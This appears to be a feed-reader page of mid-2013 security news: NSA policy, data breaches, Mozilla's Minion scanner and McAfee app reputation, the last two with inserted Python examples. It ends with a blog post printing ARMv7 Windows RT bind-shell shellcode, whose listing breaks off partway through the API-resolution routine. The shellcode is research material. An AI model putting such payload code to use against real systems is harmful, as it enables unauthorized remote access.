Shared posts

01 Aug 18:19

Google 'Pressure Cookers' And 'Backpacks' And Get A Visit From The Cops

01 Aug 16:08

Apple Update To Tackle Charger Hack Attack

01 Aug 15:16

NSA introduces two-person rule for its system administrators

by trey

Security expert Bruce Schneier writes on his blog that, in response to the Snowden fiasco, the NSA has introduced a two-person supervision rule for its system administrators. This means that any of the agency's system administrators may access and work with key information only in the presence of another admin. Since the new rule has to be rolled out at nearly 15,000 sites, it will take time before it is in force everywhere.

Keith Alexander, the head of the NSA, said that the server rooms where such data is stored are now locked and can only be entered by two-person teams. Alexander also said that, after a test period at the NSA, these safeguards would be built in at the Pentagon and the intelligence agencies.

Details here.

01 Aug 15:16

Ubuntu Forums is slowly coming back

by trey

After a security incident at ubuntuforums.org, home of the Ubuntu forums, in which the usernames, e-mail addresses and encrypted passwords of nearly 2 million users fell into unauthorized hands, the site was taken offline. Over the past few days the team responsible for the infrastructure has been working on restoring the service. The work is nearing completion, and Canonical has released a summary of what actually happened. The report can be read here.

The forums are currently accessible.

01 Aug 15:16

Lenovo is not on a blacklist after all

It was only a rumour that, for security reasons, the Chinese company's machines may not be used on protected networks in English-speaking countries.
01 Aug 15:16

Bradley Manning: guilty of espionage but not aiding the enemy. But was justice served? [POLL]

by Mark Stockley
Bradley Manning was found guilty on multiple charges of espionage, theft, computer fraud, violating a lawful general regulation and one charge of wanton publication of intelligence on the internet but not of aiding the enemy. He's now facing a lifetime behind bars. Let us know what you think about it in our poll.
01 Aug 15:15

Try something new – Beat the BlueHat Challenge!

by swiat

We were inspired by the Matasano Crypto Challenges. So we built a similar series of fun challenges to exercise reverse engineering, vulnerability discovery, and web browser manipulation attack concepts. The Xbox team helped us develop custom Xbox Live avatar items to be awarded to anyone who completes any track of the BlueHat Challenge. Beat all three tracks for access to all three avatar items (“hacker” T-shirt, “MSRC” T-shirt, “hacker” blue hat).

The challenges are all about fun and trying new things. To sign up for any of the three tracks (reverse engineering, vulnerability discovery, design-level web browser manipulation tricks), just email us at bhchall@microsoft.com. In the subject line or in the body of the message, include either [reverse], [vulns], or [web] (or click on any of those three links). Signing up for any of the three tracks will also include instructions on participating in all tracks so you can send just one email to get started.

The Challenge is designed to appeal to a wide range of people, so if the first few sets of problems seem easy, stick with it. They’ll get harder!

More information

  • There’s no restriction on who can participate, no time limit, and no way to fail.
  • There is no monetary reward, and this is not a contest. Your answers should be your own work. We hope that the fun and learning you gain from completing the Challenge is reward enough. We do plan on publicly recognizing people who finish the Challenge.
  • If you find this sort of thing fun, you’d probably like working at Microsoft in the Trustworthy Computing group. We solve problems like this every day and we have lots of open positions. You can see a list of our available positions at http://www.twccareers.com, and we encourage you to submit an application!

You may also be interested in the Microsoft Security Bounty Programs, which provide cash rewards for eligible individuals who identify security vulnerabilities.

A quick word from our lawyers…

By participating in the Challenge, you understand that we cannot control the incoming information you will disclose to our representatives in the course of submitting your answers in the Challenge, or what our representatives will remember about your submission. You also understand that we will not restrict work assignments of representatives who have had access to your submission. By participating in the Challenge, you agree that use of information in our representatives’ unaided memories in the development or deployment of our products or services does not create liability for us in connection with the Challenge or under copyright or trade secret law.

If you do not want to grant us these rights to your answers, please do not participate in the Challenge.

FAQ

What is the BlueHat Challenge?

The BlueHat Challenge is a series of computer security problems of increasing difficulty to help you build and test your skills in three areas: reverse engineering, vulnerability discovery, and web browser manipulation attack concepts.

How does it work?

The problems are given and reviewed over email. As you complete each level, send us your answers and we’ll send you the next set of problems.

Why is Microsoft doing this?

We hope to spur interest in computer security and help people improve their skills through a self-directed learning process. We also want to give something back to the community—we think these problems are going to be a lot of fun for you to solve. We had a lot of fun coming up with them!

How long should I expect to wait for my submitted answers to be evaluated?

The timeline for evaluating the problems will depend on the number of participants in the program, the difficulty of the problem, and the clarity of your answer. Your answers are being evaluated by real people, so please be patient with us!

How long will the program continue?

We plan to continue the program as long as there is sufficient community interest. Of course, we may change the program’s design over time as we learn what works best, and we may cancel the program at any time without notice. If there is a particular aspect of the program you like, or one track that you think is better developed than others, please let us know so we can do more of that and less of other things.

Is this the new monetary incentive/bounty program I’ve heard about?

No. This program is an educational challenge with no monetary reward. The new programs that offer monetary incentive are the Security Bounty Programs.

Where can I find information on Microsoft jobs?

Check out http://www.twccareers.com for careers in Microsoft Trustworthy Computing group. See http://www.microsoft.com/careers for more general Microsoft career information.

If I complete the Challenge and do well, am I guaranteed an interview or a job?

No. Your completion of the Challenge or your performance will not guarantee that you will get an interview or a job, nor will it preclude you from doing so. If you are interested in careers with Microsoft Trustworthy Computing, we encourage you to visit http://www.twccareers.com, where you can submit an application for any open positions that interest you.

Acknowledgements

Many people came together to make the BlueHat Challenge possible:

  • Couldn’t have happened without David Seidman’s logistics magic!
  • Thanks Fred Raynal and the Quarkslab team for help with the vulnerability and RE challenges
  • Thanks Manuel Caballero and Mario Heiderich for developing the web design-level challenges
  • Thanks Bill Barlowe, Andrew Ciccarelli, and Shonn Gilson for the back-end infrastructure help
  • Thanks Rollie Watson and John Doyle from Xbox and Rajat and Mike from Lakshya Digital
  • Thanks Dan Beenfeldt, Tim Hermann, and Nanae Toyozato for the “Eli the Zombie” flash game ([reverse] level 2)
  • Thanks Katie Moussouris, Mike Reavey, Leah Lease, Bruce Dang, and David Ross for inspiration

- Jonathan Ness, MSRC Engineering

01 Aug 15:10

NSA Director Defends Surveillance To Unsympathetic Black Hat Crowd

by samzenpus
Trailrunner7 writes "NSA director Gen. Keith Alexander's keynote today at Black Hat USA 2013 was a tense confessional, an hour-long emotional and sometimes angry ride that shed some new insight into the spy agency's two notorious data collection programs, inspired moments of loud applause in support of the NSA, and likewise, profane heckling that called into question the legality and morality of the agency's practices. Loud voices from the overflowing crowd called out Alexander on his claims that the NSA stands for freedom while at the same time collecting, storing and analyzing telephone business records, metadata and Internet records on Americans. He also denied lying to Congress about the NSA's capabilities and activities in the name of protecting Americans from terrorism in response to such a claim from a member of the audience."


Read more of this story at Slashdot.



01 Aug 15:07

Cybercriminal Has Heroin Delivered To Brian Krebs, Then Calls Police

by samzenpus
Okian Warrior writes in about a package of heroin that found its way to the door of Brian Krebs. "'Fans' of [security researcher Brian Krebs] have shown their affection in some curious ways. One called in a phony hostage situation that resulted in a dozen heavily armed police surrounding my home. Another opened a $20,000 new line of credit in my name. Others sent more than $1,000 in bogus PayPal donations from hacked accounts. Still more admirers paid my cable bill for the next three years using stolen credit cards. Malware authors have even used my name and likeness to peddle their wares. But the most recent attempt to embarrass and fluster this author easily takes the cake as the most elaborate: Earlier this month, the administrator of an exclusive cybercrime forum hatched and executed a plan to purchase heroin, have it mailed to my home, and then spoof a phone call from one of my neighbors alerting the local police. Thankfully, I had already established a presence on his forum and was able to monitor the scam in real time and alert my local police well in advance of the delivery."


Read more of this story at Slashdot.



01 Aug 15:06

HackRF, or playing from 30 MHz to 6 GHz

by Brian Benchoff


Up on Kickstarter, [Michael Ossmann] is launching the HackRF, an inordinately cheap, exceedingly capable software defined radio tool that’s small enough to lose in your laptop bag.

The HackRF was the subject of a lot of interest last time it was on Hackaday - the ability to receive up to 6GHz allows the HackRF to do a lot of very interesting things, including listening in on Bluetooth, WiFi, and 4G networks. Also, the ability to transmit on these frequencies means a lot of very interesting, and quite possibly slightly evil applications are open to anyone with a HackRF. Like the RTL-SDR dongles, the HackRF works with GNU Radio out of the box, meaning all those cool SDR hacks we’ve seen so far will work with this new, more powerful board.

Compared to the USB TV tuner cards that were so popular a year ago, the HackRF has 10 times the bandwidth, is able to receive up to 6GHz, and is also able to transmit. It’s only half-duplex, so to receive and transmit simultaneously you’ll need two HackRFs, or maybe wait for a hardware revision that will hopefully come sooner rather than later.

Below you can check out [Michael]'s presentation at Toorcon where the HackRF was unleashed to the world.


Filed under: kickstarter, radio hacks
31 Jul 05:35

Introducing Minion

by yboily

Minion is a platform developed by the Security Automation team at Mozilla, under development for the past year, that enables the integration and adoption of automated security testing.

The platform allows any team to set up the basic requirements to perform automated scanning and testing of websites and services by providing sensible defaults for plugins that enable scanning of many types of web applications and services.

With the 0.3 release of Minion there are several milestones that have been achieved that have allowed us to start using Minion internally across our development community, quality assurance, and security teams.

Architecture

Minion is intended to be a platform that is simple to use, easy to deploy, simple to extend, and flexible enough to be integrated into any development or operations workflow. At a high level there are three major components in Minion: Plugins, Task Engine, and Front End.

Minion Plugins are light-weight wrappers that perform tasks such as configuring, starting and stopping a plan, and accept a set of callbacks to notify the caller that information is available. In order to be used, Plugins require a plugin runner that handles the invocation of the plugins as well as the results; in addition to supporting Minion’s task engine, the Minion backend repository includes command-line scripts to execute plugins. This provides support for testing during development of new plugins and allows a high degree of flexibility in how plugins are used outside of Minion.

The Task Engine is the core platform; it provides an API for managing and configuring Plans (collections of plugins and configurations), collections of users, sites and services, and the results of executions of Plans against those targets.

The Front End is a web application that provides both administration and usage of Minion; users can perform most of the configuration tasks needed to set up Minion plans, targets and users, as well as review the results of Minion scans. Being a Mozilla project, the front-end uses Persona for authentication, but all access control based decisions are built into Minion itself.

Minion Plugins

At their heart, Minion plugins are automation scripts designed to abstract away the platform, operating system, and features that an individual security tool implements, and provide a single mechanism for configuring the tool, initiating a scan, and collecting the results.

It may be helpful to look at the code for an existing plugin to better understand how they work; the AlivePlugin is a clear, simple example.

The Alive plugin is an extremely basic plugin that confirms that a host is reachable, but it implements all of the required features, and extends a BlockingPlugin. The plugin exposes some member variables that provide user interface cues (the name, links for additional information), and in this case, some built-in report objects. The actual logic of the scan is performed in the do_run method, and since no detailed setup or stopping functionality is required, the starting and stopping functionality of the BlockingPlugin is sufficient.

Two base classes for plugins are provided in the Minion backend to get developers started:

  • BlockingPlugin: this plugin provides the basic functionality to support a plugin that performs a task and reports its completion state at the end. It is suitable for creating straightforward plugins directly in Python.
  • ExternalProcessPlugin: this plugin provides the functionality required to kick off an external tool, and provides the basis for several other extensions, especially those that wrap existing security tools.

In addition to several basic “proof of technology” plugins that collect details about targets and provide best practice information, the Minion development team is currently maintaining three other extensions:

  • OWASP Zed Attack Proxy: this plugin wraps the OWASP ZAP platform and enables detailed application scanning
  • Skipfish: a simple but powerful web fuzzer from Google
  • nmap: a port scanning tool that is generally accepted as the best in its class

Minion Task Engine

The Task Engine provides the core functionality for managing users, groups, sites, scans, and results within the Minion platform. Acting as a central hub, the Task Engine maintains a register of available plugins, provides facilities for creating and modifying plans, and managing user access to Minion, including which sites they can scan.

Plugins

Plugin deployment is one of the only features of Minion that cannot currently be managed from within the Front-End; this is a result of the configuration needed to deploy them, but the Minion Front-End provides the ability to review the available plugins, and get the class details, which is the information required to add a plugin to a Plan.

Plans

A Minion Plan is a JSON document that provides some information about what the plan does, and a sequence of tools to invoke. An example can be found below:


{
     "name": "Fuzz and Scan",
     "description": "Run Skipfish to fuzz the application, and perform a ZAP scan.",
     "workflow": [
          {
               "plugin_name": "minion.plugins.skipfish.SkipfishPlugin",
               "description": "",
               "configuration": {}
          },
          {
               "plugin_name": "minion.plugins.zap_plugin.ZAPPlugin",
               "description": "Run the ZAP Spider and Scanner",
               "configuration": {
                    "scan": true
               }
          }
     ]
}

In this example, the name and description are intended to be human readable descriptions of what the plan will do, while the workflow array contains a set of plugin names, a description that will be included in the plan details, and a set of configuration details that may be plugin specific.
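A validator for plan documents of the shape shown above, as an added example that is not Minion's own code: it checks the structure this section describes and that each plugin_name is in a register of deployed plugins; the register is constructed here and stands in for the one the Task Engine maintains.

```python
import json
import re
from typing import Any, List

# Constructed register of deployed plugin classes, standing in for the Task
# Engine's own register. The two entries are the names used in the example plan.
KNOWN_PLUGINS = {
    "minion.plugins.skipfish.SkipfishPlugin",
    "minion.plugins.zap_plugin.ZAPPlugin",
}

# A plugin_name is a dotted Python path: at least one package, then a class name.
_PLUGIN_NAME_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*(\.[A-Za-z_][A-Za-z0-9_]*)+$")

PLAN_KEYS = {"name", "description", "workflow"}
STEP_KEYS = {"plugin_name", "description", "configuration"}


def validate_plan(plan: Any, known_plugins=KNOWN_PLUGINS) -> List[str]:
    """Return a list of problems with a parsed plan; an empty list means valid."""
    errors: List[str] = []
    if not isinstance(plan, dict):
        return ["plan must be a JSON object"]
    missing = PLAN_KEYS - set(plan)
    if missing:
        errors.append("plan is missing keys: " + ", ".join(sorted(missing)))
    # Rejecting unknown keys is this example's choice: it catches misspelled keys
    # that would otherwise be silently ignored.
    unknown = set(plan) - PLAN_KEYS
    if unknown:
        errors.append("plan has unexpected keys: " + ", ".join(sorted(unknown)))
    if not isinstance(plan.get("name"), str) or not plan["name"].strip():
        errors.append("name must be a non-empty string")
    if not isinstance(plan.get("description"), str):
        errors.append("description must be a string")
    workflow = plan.get("workflow")
    if not isinstance(workflow, list) or not workflow:
        errors.append("workflow must be a non-empty array")
        return errors
    for i, step in enumerate(workflow):
        errors.extend(f"workflow[{i}]: {e}" for e in _validate_step(step, known_plugins))
    return errors


def _validate_step(step: Any, known_plugins) -> List[str]:
    """Validate one workflow entry: plugin_name, description, configuration."""
    errors: List[str] = []
    if not isinstance(step, dict):
        return ["step must be a JSON object"]
    missing = STEP_KEYS - set(step)
    if missing:
        errors.append("missing keys: " + ", ".join(sorted(missing)))
    unknown = set(step) - STEP_KEYS
    if unknown:
        errors.append("unexpected keys: " + ", ".join(sorted(unknown)))
    name = step.get("plugin_name")
    if not isinstance(name, str) or not _PLUGIN_NAME_RE.match(name):
        errors.append("plugin_name must be a dotted class path")
    elif name not in known_plugins:
        # The plan references a plugin that has not been deployed.
        errors.append(f"plugin {name!r} is not deployed")
    if not isinstance(step.get("description"), str):
        errors.append("description must be a string")
    if not isinstance(step.get("configuration"), dict):
        errors.append("configuration must be a JSON object")
    return errors


def validate_plan_text(text: str, known_plugins=KNOWN_PLUGINS) -> List[str]:
    """Parse a plan from JSON text and validate it; syntax errors are reported too."""
    try:
        plan = json.loads(text)
    except json.JSONDecodeError as exc:
        return [f"invalid JSON: {exc.msg} at line {exc.lineno}"]
    return validate_plan(plan, known_plugins)


# The plan from the post above, embedded as the sample input.
SAMPLE_PLAN = """
{
  "name": "Fuzz and Scan",
  "description": "Run Skipfish to fuzz the application, and perform a ZAP scan.",
  "workflow": [
    {"plugin_name": "minion.plugins.skipfish.SkipfishPlugin",
     "description": "", "configuration": {}},
    {"plugin_name": "minion.plugins.zap_plugin.ZAPPlugin",
     "description": "Run the ZAP Spider and Scanner",
     "configuration": {"scan": true}}
  ]
}
"""

if __name__ == "__main__":
    problems = validate_plan_text(SAMPLE_PLAN)
    print("plan is valid" if not problems else "\n".join(problems))
```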

Users and Invites

Minion is intended to be a team oriented tool; as a result, the platform allows user and group management. User accounts are created through an invitation mechanism, or via the administrative interface. The invitation system allows administrators to pre-create groups, sites and plans within Minion, and then add a user to that group before the user has enrolled. Once the invite is issued, an email is sent to the user, who can then access a configured profile.

Groups

Groups are the mechanism by which administrators control which sites and results users have visibility into within Minion. In order for a user to be able to interact with a site via Minion, that user needs to be added to the group, and the site needs to be associated with that group. This provides extremely fine grained control over visibility into scan results. Currently group membership allows both viewing of scans and the ability to re-execute a scan, but as the project progresses, constraints can be added to allow users to review results but not initiate scans.

Minion Front-End

Designed to be easy to use and provide instant feedback, the front-end provides access to the Minion platform. Each of the pieces of the functionality described above is accessible via the front-end, and is explicitly enabled by calling the web services exposed by the Task Engine. One of the advantages of the architecture is that the front-end can be easily re-engineered with no impact to the back-end or plugins.

Technologies

Minion is built with Python, Angular.js, and several packages that assist in ensuring a reliable end to end service. These technologies were selected by our development team, but the architecture and each of the service boundaries are intended to use JSON calls to permit easy integration with other services. Because of the design principles applied, it is entirely possible to implement plugins that run on any operating system or platform and do not need to reside on the same service. With the appropriate network configuration it is possible to deploy the front-end, task engine, and plugins on different networks, which lets users limit the attack surface that needs to be deployed in sensitive networks.

Road Map

There are several features that are under active development, and should be implemented over the next several releases.

Authentication & Access Management

Site Ownership Verification

This is a critical feature that enables users to demonstrate ownership of a site before initiating scans.

Granular Access Control

The ability to govern users ability to scan by group and site ownership as well as role.

Plugin Improvements

Improved Results Reporting

Minion is only as good as its plugins. Now that we have a working and reliable core platform, refining plugin results and improving reporting is a core objective.

Deferred Execution Plugins

Sample implementations of invoking third party services, so that we can demonstrate integrating with other Security as a Service platforms.

Reporting Plugins

Currently we have assigned risk ratings to findings based on our best practices, but that is not necessarily reflective of the priority of issues to other teams. We intend to implement a pluggable reporting interface, including the ability to add plugins to modify the risk ratings based on the security posture and priorities of the teams using Minion.

Front End

Landing Pages

Currently Minion is designed for technical users who have a need to see deep technical details. In the future, it may be desirable to generate metrics and dashboards, and to facilitate that Landing page support will be implemented to allow customization for user views.

Task Engine Improvements

Cohort

Minion is designed to support dynamic analysis via web application scanning. This is only one part of the story regarding how to perform automated security testing. Cohort is a branch of Minion that will enable analysis of source code repositories and perform static analysis.

Historical Issues

In order to facilitate ongoing tracking of a security program, support and integration for third party issue trackers (initial targets are Bugzilla and Github), and the ability to compare multiple scans over time will be implemented.

Why Minion?

The Mozilla Security team supports hundreds of websites and services, and products used by hundreds of millions of users. In addition our team supports hundreds of employees and thousands of community members that contribute to Mozilla products and services. Scaling to that level is not feasible without improving automation capabilities. While it would be much easier to solve this problem for ourselves, Mozilla’s mission is to support the open web and protect our users. By building Minion as a foundation for a security as a service platform, integrating open source and free tools, then releasing it as open source, we aim to contribute a platform that can be used by any team to dramatically improve their coverage, and integrate security testing automation in all parts of their IT operations and software development processes.

Minion is an open source project, and we welcome contributors, users, and feedback!

Finally, I would like to extend a huge thanks to Stefan Arentz, Simon Bennetts, Yeuk Hon Wong, Matthew Fuller, and all of the other developers who have moved Minion from a sheet of paper and a set of shell scripts to a production service!

31 Jul 05:35

Introducing App Reputation for Android Apps

by Alok Shukla

McAfee has always been at the forefront of finding new ways to secure our customers against threats and risks posed by mobile devices. As part of this quest, we have introduced the concept of app reputation in our latest release of McAfee Mobile Security (MMS Version 3.1), released on 18th July 2013. From a consumer perspective, we have strengthened our twin features of security and privacy with app reputations in this release.

What is app reputation?

We assign a rating to an Android app along two vectors: trust (security) and privacy (data exposure). For trust (security), we measure the amount of trust that can be attached to an app based on security considerations. The privacy (data exposure) reputation measures the propensity of an app to access, share and expose personal data. These reputations are based on the results of an automated analysis and are influenced by multiple factors including age, prevalence, source, etc.

How is Trust (Security) reputation different from Privacy (Data Exposure) reputation?

While the concept of security is the same for all users, risk to an individual’s privacy is appreciated differently in different cultures. Furthermore, unlike safety and security, which are intuitive to most of us, the concept of privacy is a trained behavior leading to different responses to privacy risks based on an individual’s context. At McAfee, we appreciate this and it reflects in our design. Hence the goal of privacy reputation is to provide information and avoid taking a uniform decision for all users, unlike what we do in trust reputation.

As the following screenshot indicates, we provide the data exposure score range, category score range, our observations about the app, and information related to ad libraries.

App Reputation

What are Notable apps?

Notable apps are those behaving outside of their category’s normal behavior. We understand that some categories of apps have a need to access more personal information than others. For example, a social media or a communication app would have a better case for accessing personal data than a calculator (productivity) app. So if a calculator app tries to access personal data normally not accessed by other apps in its category, it may be classified as a notable app.
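One way to make the category-relative "notable app" idea concrete, as an added example that is not McAfee's method: each app declares a set of personal-data accesses, the prevalence of each access is computed per category, and an app is notable when it uses an access that almost no other app in its category uses. The apps, categories, weights and threshold are constructed for this example.

```python
from collections import Counter, defaultdict
from typing import Dict, List, Set, Tuple

# Constructed sample catalogue: (app name, category, personal-data accesses).
APPS: List[Tuple[str, str, Set[str]]] = [
    ("ChatNow", "communication", {"contacts", "location", "sms"}),
    ("Mailer", "communication", {"contacts", "accounts"}),
    ("TalkBox", "communication", {"contacts", "sms", "microphone"}),
    ("SocialFeed", "social", {"contacts", "location", "camera"}),
    ("Snapshare", "social", {"contacts", "camera"}),
    ("CalcPlus", "productivity", set()),
    ("Notes", "productivity", {"storage"}),
    ("UnitConv", "productivity", set()),
    ("FreeCalc", "productivity", {"contacts", "location", "storage"}),
]

# Constructed weights for a simple data exposure score: higher means more
# sensitive personal data.
WEIGHTS: Dict[str, int] = {
    "contacts": 3, "location": 3, "sms": 3,
    "microphone": 2, "camera": 2, "accounts": 2, "storage": 1,
}


def exposure_score(accesses: Set[str]) -> int:
    """Sum of the weights of the personal-data accesses an app uses."""
    return sum(WEIGHTS.get(a, 1) for a in accesses)


def category_score_ranges(apps) -> Dict[str, Tuple[int, int]]:
    """Min and max exposure score observed per category (the category score range)."""
    scores: Dict[str, List[int]] = defaultdict(list)
    for _, category, accesses in apps:
        scores[category].append(exposure_score(accesses))
    return {c: (min(s), max(s)) for c, s in scores.items()}


def category_prevalence(apps) -> Dict[str, Dict[str, float]]:
    """For each category, the fraction of its apps that use each data access."""
    counts: Dict[str, Counter] = defaultdict(Counter)
    sizes: Counter = Counter()
    for _, category, accesses in apps:
        sizes[category] += 1
        counts[category].update(accesses)
    return {c: {a: counts[c][a] / sizes[c] for a in counts[c]} for c in sizes}


def notable_apps(apps, max_prevalence: float = 0.3) -> Dict[str, List[str]]:
    """Map each notable app to the accesses that are unusual for its category.

    An access is unusual when at most max_prevalence of the category's apps use
    it. A category with a single app can never be judged this way, because every
    access it uses has prevalence 1.0.
    """
    prevalence = category_prevalence(apps)
    result: Dict[str, List[str]] = {}
    for name, category, accesses in apps:
        unusual = sorted(a for a in accesses
                         if prevalence[category].get(a, 0.0) <= max_prevalence)
        if unusual:
            result[name] = unusual
    return result


if __name__ == "__main__":
    ranges = category_score_ranges(APPS)
    for name, category, accesses in APPS:
        print(f"{name:11} {category:14} score={exposure_score(accesses)} "
              f"category range={ranges[category]}")
    for name, unusual in notable_apps(APPS).items():
        print(f"notable: {name} uses {', '.join(unusual)} unlike its category")
```

With the sample catalogue, FreeCalc is the only notable app: contacts and location are each used by a quarter of the productivity apps, while every other access sits above the threshold in its category.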

This is the first blog in a series of posts on app reputation.

31 Jul 05:34

Google Starts Upgrading Its SSL Certificates To 2048-bit Keys

by Soulskill
An anonymous reader writes "Google today announced it has already started upgrading all of its SSL certificates to 2048-bit keys. The goal is to beef up the encryption on the connections made to its services. Google says the upgrade, which includes the root certificate that the company uses to sign all of its SSL certificates, will be completed 'in the next few months.' Previously, however, Google was more specific and said it was aiming to finish the process by the end of 2013."


Read more of this story at Slashdot.



30 Jul 19:57

BGP multiple banking addresses hijacked, (Mon, Jul 29th)

BGP multiple banking addresses hijacked

On 24 July 2013 a significant number ...(more)...

30 Jul 19:55

22nd International Obfuscated C Code Contest Starts Thursday 1 Aug 2013

by Unknown Lamer
achowe writes "The 22nd International Obfuscated C Code Contest opens 2013-Aug-01 03:14:15 UTC through to 2013-Oct-03 09:26:53 UTC. The rules have been updated, in particular Rule 2 (size rule) has changed. The draft rules and guidelines are available online. In addition there is now an IOCCC Size Rule Tool to aid with counting the secondary size rule. Questions and comments for the Judges can be emailed to q.2013@ioccc.org and must include 'IOCCC 2013' in the subject. Or contact them via Twitter @IOCCC." Anyone planning on entering?


Read more of this story at Slashdot.



30 Jul 19:55

Lenovo PCs Banned By Top Spy Agencies

29 Jul 18:54

[local] - Novell Client 2 SP3 Privilege Escalation Exploit

Novell Client 2 SP3 Privilege Escalation Exploit
29 Jul 13:29

[papers] - nginx Exploit Documentation About a Generic Way to Exploit Linux Targets

nginx Exploit Documentation About a Generic Way to Exploit Linux Targets
29 Jul 13:25

Ransomware tricks child sex abuse image addict into turning self in to cops

by John Hawes
A US child abuse image collector turned himself in to police earlier this month, after ransomware hit his PC and showed messages warning him that the FBI were on to his nasty activities.
29 Jul 13:24

Stanford University hacked, becomes latest data breach victim

by John Hawes
Yet more passwords need changing, as America's prestigious Stanford University joins the long line of recent data breach victims. Although specific details remain scarce, an announcement from the university authorities urges all users, which may include staff and alumni as well as students, to ensure their details are checked and updated ASAP.
29 Jul 13:24

Cisco’s Acquisition of Sourcefire Highlights Need for a New Generation of Security Technology

by Fred.Go
Cisco this week rocked the security community with its plans to acquire Sourcefire for a whopping $2.7 billion – a 78 times multiple of projected earnings! Given the huge premium (called ‘outrageous’ by one street analyst) and the fact that Cisco already has its own IDS/IPS, it should be apparent to those paying attention that it wasn’t Sourcefire’s IDS/IPS technology Cisco was after. It was Sourcefire’s next-generation threat detection capabilities.
29 Jul 13:22

English High Court Bans Publication of 0-Day Threat To Auto Immobilizers

by timothy
An anonymous reader writes "The High Court — England's highest civil court — has temporarily banned the publication of a scientific paper that would reveal the details of a zero day vulnerability in vehicle immobilisers and, crucially, give details of how to crack the system. Motor manufacturers argued that revealing the details of the crack would allow criminals to steal cars. Could this presage the courts getting involved in what gets posted on your local Bugzilla? It certainly means that software giants who dislike security researchers publishing the full facts on vulnerabilities might want to consider a full legal route."


Read more of this story at Slashdot.



29 Jul 13:04

Windows RT ARMv7-based Shellcode Development

by Matt
Recently, I've taken an interest in gaining code execution on my Surface RT tablet. I have found Windows RT to be rather enticing since Microsoft has made a concerted effort to prevent the execution of unsigned code. A couple weeks ago I discovered a way to gain arbitrary shellcode execution via PowerShell. I will have a separate blog post on that topic once I get a thumbs up from Microsoft. And for the record, I am aware of the awesome public Windows RT jailbreak.

Anyway, seeing as I'm already fairly comfortable writing x86 and x86_64 shellcode, I wanted to take on the challenge of writing ARMv7-based shellcode for Windows since no one else seems to be doing it publicly. Knowing that writing shellcode from scratch would have been rather painful and prone to error, I decided to write my payload in C and then modify the resulting assembly listing slightly in order to achieve a position independent payload. Here is the result (noting that this is merely a working proof-of-concept):

; PoC ARMv7-A Windows RT Bind Shell
; Tested on: Microsoft Surface RT Tablet w/ Windows RT (6.2.9200)
; Syntax: MASM
; Notes: In order for this to work properly, you have to call this payload
; at baseaddress + 1 since it is thumb code.
; This was built with armasm.exe from Visual Studio 2012

; Author: Matthew Graeber (@mattifestation)
; License: BSD 3-Clause

AREA |.foo|, CODE, THUMB
; After linking, the resulting executable will only
; have a single section (with RX permissions) named .foo

EXPORT main

main
push {r4,lr} ; Preserve registers on the stack
bl ExecutePayload ; Execute bind shell function
pop {r4,pc} ; Restore registers on the stack and return to caller


GetProcAddress
; ARM (Thumb) implementation of the logic from the Metasploit x86 block_api shellcode
push {r1-r11,lr} ; Preserve registers on the stack
mov r9,r0 ; Save the function hash in R9
mrc p15,#0,r3,c13,c0,#2 ; R3 = &TEB
ldr r3,[r3,#0x30] ; R3 = &PEB
ldr r3,[r3,#0xC] ; R3 = PEB->Ldr
movs r6,#0 ; R6 = 0
ldr r1,[r3,#0xC] ; R1 = Ldr->InLoadOrderModuleList
ldr r4,[r1,#0x18] ; R4 = LDR_DATA_TABLE_ENTRY.DllBase
ldr r3,[r1,#0x2C] ; R3 = LDR_DATA_TABLE_ENTRY.BaseDllName
ldr r7,[r1,#0x30] ; R7 = LDR_DATA_TABLE_ENTRY.BaseDllName.Buffer
str r3,[sp] ; Store BaseDllName.Length/MaximumLength on the stack
cbz r4,exit_failure ; If DllBase == 0, you've likely reached the end of the module list. Return 0.
mov r10,#0xD ; R10 = ROR value (13)
mov r11,#0xD ; R11 = ROR value (13)
get_module_hash ; Improvement: Need to validate MaximumLength != 0
ldrh r5,[sp,#2] ; BaseDllName.MaximumLength
movs r2,#0 ; i = 0
cbz r5,get_export_dir ; Reached the last char of BaseDllName
ror_module_char
ldrsb r3,[r7,r2] ; R3 = (CHAR) *((PCSTR) BaseDllName.Buffer + i)
rors r0,r6,r10 ; Calculate the next portion of the module hash
cmp r3,#0x61 ; Is the character lower case?
blt notlowercase
adds r3,r3,r0 ; Add to the running hash value
subs r6,r3,#0x20 ; Convert character to upper case
b get_next_char
notlowercase
adds r6,r3,r0 ; Add to the running hash value
get_next_char
adds r2,#1 ; Move to the next character
cmp r2,r5 ; Reached the last character in the module name?
bcc ror_module_char ; If not, move on to the next character
get_export_dir
; At this point, the module hash has been calculated.
; Now begin calculating the function hash
ldr r3,[r4,#0x3C] ; IMAGE_DOS_HEADER.e_lfanew - i.e. offset to PE IMAGE_NT_HEADERS
adds r3,r3,r4 ; PIMAGE_NT_HEADERS
ldr r3,[r3,#0x78] ; IMAGE_DIRECTORY_ENTRY_EXPORT.VirtualAddress (only an RVA at this point)
cbz r3,get_next_module ; Move to the next module if it doesn't have an export directory (i.e. most exe files)
adds r5,r3,r4 ; Calculate export dir virtual address
ldr r3,[r5,#0x20] ; R3 = PIMAGE_EXPORT_DIRECTORY->AddressOfNames
ldr r7,[r5,#0x18] ; R7 = PIMAGE_EXPORT_DIRECTORY->NumberOfNames
movs r0,#0
adds r8,r3,r4 ; AddressOfNames VA
cbz r7,get_next_module ; Move on to the next module if there are no exported names
calc_func_hash
ldr r3,[r8],#4 ; R3 = Current name RVA
movs r2,#0
adds lr,r3,r4 ; lr = Current name VA
get_func_char
ldrsb r3,[lr] ; Load char from the function name
rors r2,r2,r11 ; Calculate the next portion of the function hash
adds r2,r2,r3 ; Add to the running hash value
ldrsb r3,[lr],#1 ; Peek at the next char
cmp r3,#0 ; Are you at the end of the function string?
bne get_func_char ; If not, calculate hash for the next char.
adds r3,r2,r6 ; Add the module hash to the function hash
cmp r3,r9 ; Does the calculated hash match the hash provided?
beq get_func_addr
adds r0,#1
cmp r0,r7 ; Are there more functions to process?
bcc calc_func_hash
get_next_module
ldr r1,[r1] ; LDR_DATA_TABLE_ENTRY.InLoadOrderLinks.Flink
movs r6,#0 ; Clear the function hash
; Improvement: The following portion is redundant
ldr r4,[r1,#0x18] ; R4 = LDR_DATA_TABLE_ENTRY.DllBase
ldr r3,[r1,#0x2C] ; R3 = LDR_DATA_TABLE_ENTRY.BaseDllName
ldr r7,[r1,#0x30] ; R7 = LDR_DATA_TABLE_ENTRY.BaseDllName.Buffer
cmp r4,#0 ; DllBase == 0?
str r3,[sp] ; Store BaseDllName.Length/MaximumLength on the stack
bne get_module_hash
exit_failure
movs r0,#0 ; Return 0 upon failure to find a matching hash
exit_success
